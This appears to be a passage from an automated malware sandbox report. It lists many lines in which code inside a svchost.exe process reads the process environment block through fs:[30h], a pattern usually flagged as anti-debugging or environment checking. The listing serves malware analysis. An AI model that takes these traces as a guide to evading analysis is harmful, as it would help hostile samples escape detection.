          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033053FC mov eax, dword ptr fs:[00000030h]2_2_033053FC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E3F0 mov eax, dword ptr fs:[00000030h]2_2_0324E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E3F0 mov eax, dword ptr fs:[00000030h]2_2_0324E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E3F0 mov eax, dword ptr fs:[00000030h]2_2_0324E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032663FF mov eax, dword ptr fs:[00000030h]2_2_032663FF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EC3CD mov eax, dword ptr fs:[00000030h]2_2_032EC3CD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]2_2_0323A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]2_2_0323A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]2_2_0323A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]2_2_0323A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]2_2_0323A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]2_2_0323A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h]2_2_032383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h]2_2_032383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h]2_2_032383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h]2_2_032383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B63C0 mov eax, dword ptr fs:[00000030h]2_2_032B63C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EB3D0 mov ecx, dword ptr fs:[00000030h]2_2_032EB3D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03305227 mov eax, dword ptr fs:[00000030h]2_2_03305227
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322823B mov eax, dword ptr fs:[00000030h]2_2_0322823B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03267208 mov eax, dword ptr fs:[00000030h]2_2_03267208
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03267208 mov eax, dword ptr fs:[00000030h]2_2_03267208
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03234260 mov eax, dword ptr fs:[00000030h]2_2_03234260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03234260 mov eax, dword ptr fs:[00000030h]2_2_03234260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03234260 mov eax, dword ptr fs:[00000030h]2_2_03234260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FD26B mov eax, dword ptr fs:[00000030h]2_2_032FD26B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FD26B mov eax, dword ptr fs:[00000030h]2_2_032FD26B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322826B mov eax, dword ptr fs:[00000030h]2_2_0322826B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03259274 mov eax, dword ptr fs:[00000030h]2_2_03259274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03271270 mov eax, dword ptr fs:[00000030h]2_2_03271270
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03271270 mov eax, dword ptr fs:[00000030h]2_2_03271270
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03229240 mov eax, dword ptr fs:[00000030h]2_2_03229240
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03229240 mov eax, dword ptr fs:[00000030h]2_2_03229240
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B8243 mov eax, dword ptr fs:[00000030h]2_2_032B8243
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B8243 mov ecx, dword ptr fs:[00000030h]2_2_032B8243
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326724D mov eax, dword ptr fs:[00000030h]2_2_0326724D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A250 mov eax, dword ptr fs:[00000030h]2_2_0322A250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EB256 mov eax, dword ptr fs:[00000030h]2_2_032EB256
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EB256 mov eax, dword ptr fs:[00000030h]2_2_032EB256
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236259 mov eax, dword ptr fs:[00000030h]2_2_03236259
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BD250 mov ecx, dword ptr fs:[00000030h]2_2_032BD250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032452A0 mov eax, dword ptr fs:[00000030h]2_2_032452A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032452A0 mov eax, dword ptr fs:[00000030h]2_2_032452A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032452A0 mov eax, dword ptr fs:[00000030h]2_2_032452A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032452A0 mov eax, dword ptr fs:[00000030h]2_2_032452A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F92A6 mov eax, dword ptr fs:[00000030h]2_2_032F92A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F92A6 mov eax, dword ptr fs:[00000030h]2_2_032F92A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F92A6 mov eax, dword ptr fs:[00000030h]2_2_032F92A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F92A6 mov eax, dword ptr fs:[00000030h]2_2_032F92A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]2_2_032C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C62A0 mov ecx, dword ptr fs:[00000030h]2_2_032C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]2_2_032C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]2_2_032C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]2_2_032C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]2_2_032C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C72A0 mov eax, dword ptr fs:[00000030h]2_2_032C72A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C72A0 mov eax, dword ptr fs:[00000030h]2_2_032C72A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B92BC mov eax, dword ptr fs:[00000030h]2_2_032B92BC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B92BC mov eax, dword ptr fs:[00000030h]2_2_032B92BC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B92BC mov ecx, dword ptr fs:[00000030h]2_2_032B92BC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B92BC mov ecx, dword ptr fs:[00000030h]2_2_032B92BC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E284 mov eax, dword ptr fs:[00000030h]2_2_0326E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E284 mov eax, dword ptr fs:[00000030h]2_2_0326E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B0283 mov eax, dword ptr fs:[00000030h]2_2_032B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B0283 mov eax, dword ptr fs:[00000030h]2_2_032B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B0283 mov eax, dword ptr fs:[00000030h]2_2_032B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03305283 mov eax, dword ptr fs:[00000030h]2_2_03305283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326329E mov eax, dword ptr fs:[00000030h]2_2_0326329E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326329E mov eax, dword ptr fs:[00000030h]2_2_0326329E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E12ED mov eax, dword ptr fs:[00000030h]2_2_032E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E12ED mov eax, dword ptr fs:[00000030h]2_2_032E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E12ED mov eax, dword ptr fs:[00000030h]2_2_032E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E12ED mov eax, dword ptr fs:[00000030h]2_2_032E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E12ED mov eax, dword ptr fs:[00000030h]2_2_032E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E12ED mov eax, dword ptr fs:[00000030h]2_2_032E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E12ED mov eax, dword ptr fs:[00000030h]2_2_032E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E12ED mov eax, dword ptr fs:[00000030h]2_2_032E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E12ED mov eax, dword ptr fs:[00000030h]2_2_032E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E12ED mov eax, dword ptr fs:[00000030h]2_2_032E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E12ED mov eax, dword ptr fs:[00000030h]2_2_032E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E12ED mov eax, dword ptr fs:[00000030h]2_2_032E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E12ED mov eax, dword ptr fs:[00000030h]2_2_032E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E12ED mov eax, dword ptr fs:[00000030h]2_2_032E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032402E1 mov eax, dword ptr fs:[00000030h]2_2_032402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032402E1 mov eax, dword ptr fs:[00000030h]2_2_032402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032402E1 mov eax, dword ptr fs:[00000030h]2_2_032402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033052E2 mov eax, dword ptr fs:[00000030h]2_2_033052E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EF2F8 mov eax, dword ptr fs:[00000030h]2_2_032EF2F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032292FF mov eax, dword ptr fs:[00000030h]2_2_032292FF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]2_2_0323A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]2_2_0323A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]2_2_0323A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]2_2_0323A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]2_2_0323A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325B2C0 mov eax, dword ptr fs:[00000030h]2_2_0325B2C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325B2C0 mov eax, dword ptr fs:[00000030h]2_2_0325B2C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325B2C0 mov eax, dword ptr fs:[00000030h]2_2_0325B2C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325B2C0 mov eax, dword ptr fs:[00000030h]2_2_0325B2C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325B2C0 mov eax, dword ptr fs:[00000030h]2_2_0325B2C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325B2C0 mov eax, dword ptr fs:[00000030h]2_2_0325B2C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325B2C0 mov eax, dword ptr fs:[00000030h]2_2_0325B2C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032392C5 mov eax, dword ptr fs:[00000030h]2_2_032392C5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032392C5 mov eax, dword ptr fs:[00000030h]2_2_032392C5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322B2D3 mov eax, dword ptr fs:[00000030h]2_2_0322B2D3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322B2D3 mov eax, dword ptr fs:[00000030h]2_2_0322B2D3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322B2D3 mov eax, dword ptr fs:[00000030h]2_2_0322B2D3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325F2D0 mov eax, dword ptr fs:[00000030h]2_2_0325F2D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325F2D0 mov eax, dword ptr fs:[00000030h]2_2_0325F2D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03260124 mov eax, dword ptr fs:[00000030h]2_2_03260124
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03231131 mov eax, dword ptr fs:[00000030h]2_2_03231131
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03231131 mov eax, dword ptr fs:[00000030h]2_2_03231131
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322B136 mov eax, dword ptr fs:[00000030h]2_2_0322B136
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322B136 mov eax, dword ptr fs:[00000030h]2_2_0322B136
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322B136 mov eax, dword ptr fs:[00000030h]2_2_0322B136
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322B136 mov eax, dword ptr fs:[00000030h]2_2_0322B136
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DA118 mov ecx, dword ptr fs:[00000030h]2_2_032DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DA118 mov eax, dword ptr fs:[00000030h]2_2_032DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DA118 mov eax, dword ptr fs:[00000030h]2_2_032DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DA118 mov eax, dword ptr fs:[00000030h]2_2_032DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F0115 mov eax, dword ptr fs:[00000030h]2_2_032F0115
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F172 mov eax, dword ptr fs:[00000030h]2_2_0322F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F172 mov eax, dword ptr fs:[00000030h]2_2_0322F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F172 mov eax, dword ptr fs:[00000030h]2_2_0322F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F172 mov eax, dword ptr fs:[00000030h]2_2_0322F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F172 mov eax, dword ptr fs:[00000030h]2_2_0322F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F172 mov eax, dword ptr fs:[00000030h]2_2_0322F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F172 mov eax, dword ptr fs:[00000030h]2_2_0322F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F172 mov eax, dword ptr fs:[00000030h]2_2_0322F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F172 mov eax, dword ptr fs:[00000030h]2_2_0322F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F172 mov eax, dword ptr fs:[00000030h]2_2_0322F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F172 mov eax, dword ptr fs:[00000030h]2_2_0322F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F172 mov eax, dword ptr fs:[00000030h]2_2_0322F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F172 mov eax, dword ptr fs:[00000030h]2_2_0322F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F172 mov eax, dword ptr fs:[00000030h]2_2_0322F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F172 mov eax, dword ptr fs:[00000030h]2_2_0322F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F172 mov eax, dword ptr fs:[00000030h]2_2_0322F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F172 mov eax, dword ptr fs:[00000030h]2_2_0322F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F172 mov eax, dword ptr fs:[00000030h]2_2_0322F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F172 mov eax, dword ptr fs:[00000030h]2_2_0322F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F172 mov eax, dword ptr fs:[00000030h]2_2_0322F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F172 mov eax, dword ptr fs:[00000030h]2_2_0322F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C9179 mov eax, dword ptr fs:[00000030h]2_2_032C9179
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03305152 mov eax, dword ptr fs:[00000030h]2_2_03305152
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]2_2_032C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]2_2_032C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C4144 mov ecx, dword ptr fs:[00000030h]2_2_032C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]2_2_032C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]2_2_032C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03229148 mov eax, dword ptr fs:[00000030h]2_2_03229148
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03229148 mov eax, dword ptr fs:[00000030h]2_2_03229148
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03229148 mov eax, dword ptr fs:[00000030h]2_2_03229148
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03229148 mov eax, dword ptr fs:[00000030h]2_2_03229148
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C3140 mov eax, dword ptr fs:[00000030h]2_2_032C3140
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C3140 mov eax, dword ptr fs:[00000030h]2_2_032C3140
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C3140 mov eax, dword ptr fs:[00000030h]2_2_032C3140
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03237152 mov eax, dword ptr fs:[00000030h]2_2_03237152
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322C156 mov eax, dword ptr fs:[00000030h]2_2_0322C156
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C8158 mov eax, dword ptr fs:[00000030h]2_2_032C8158
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236154 mov eax, dword ptr fs:[00000030h]2_2_03236154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236154 mov eax, dword ptr fs:[00000030h]2_2_03236154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E11A4 mov eax, dword ptr fs:[00000030h]2_2_032E11A4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E11A4 mov eax, dword ptr fs:[00000030h]2_2_032E11A4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E11A4 mov eax, dword ptr fs:[00000030h]2_2_032E11A4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E11A4 mov eax, dword ptr fs:[00000030h]2_2_032E11A4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324B1B0 mov eax, dword ptr fs:[00000030h]2_2_0324B1B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03270185 mov eax, dword ptr fs:[00000030h]2_2_03270185
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EC188 mov eax, dword ptr fs:[00000030h]2_2_032EC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EC188 mov eax, dword ptr fs:[00000030h]2_2_032EC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]2_2_032B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]2_2_032B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]2_2_032B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]2_2_032B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A197 mov eax, dword ptr fs:[00000030h]2_2_0322A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A197 mov eax, dword ptr fs:[00000030h]2_2_0322A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A197 mov eax, dword ptr fs:[00000030h]2_2_0322A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03287190 mov eax, dword ptr fs:[00000030h]2_2_03287190
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032551EF mov eax, dword ptr fs:[00000030h]2_2_032551EF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032551EF mov eax, dword ptr fs:[00000030h]2_2_032551EF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032551EF mov eax, dword ptr fs:[00000030h]2_2_032551EF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032551EF mov eax, dword ptr fs:[00000030h]2_2_032551EF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032551EF mov eax, dword ptr fs:[00000030h]2_2_032551EF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032551EF mov eax, dword ptr fs:[00000030h]2_2_032551EF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032551EF mov eax, dword ptr fs:[00000030h]2_2_032551EF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032551EF mov eax, dword ptr fs:[00000030h]2_2_032551EF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032551EF mov eax, dword ptr fs:[00000030h]2_2_032551EF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032551EF mov eax, dword ptr fs:[00000030h]2_2_032551EF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032551EF mov eax, dword ptr fs:[00000030h]2_2_032551EF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032551EF mov eax, dword ptr fs:[00000030h]2_2_032551EF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032551EF mov eax, dword ptr fs:[00000030h]2_2_032551EF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032351ED mov eax, dword ptr fs:[00000030h]2_2_032351ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D71F9 mov esi, dword ptr fs:[00000030h]2_2_032D71F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033061E5 mov eax, dword ptr fs:[00000030h]2_2_033061E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032601F8 mov eax, dword ptr fs:[00000030h]2_2_032601F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F61C3 mov eax, dword ptr fs:[00000030h]2_2_032F61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F61C3 mov eax, dword ptr fs:[00000030h]2_2_032F61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326D1D0 mov eax, dword ptr fs:[00000030h]2_2_0326D1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326D1D0 mov ecx, dword ptr fs:[00000030h]2_2_0326D1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]2_2_032AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]2_2_032AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_032AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]2_2_032AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]2_2_032AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033051CB mov eax, dword ptr fs:[00000030h]2_2_033051CB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A020 mov eax, dword ptr fs:[00000030h]2_2_0322A020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322C020 mov eax, dword ptr fs:[00000030h]2_2_0322C020
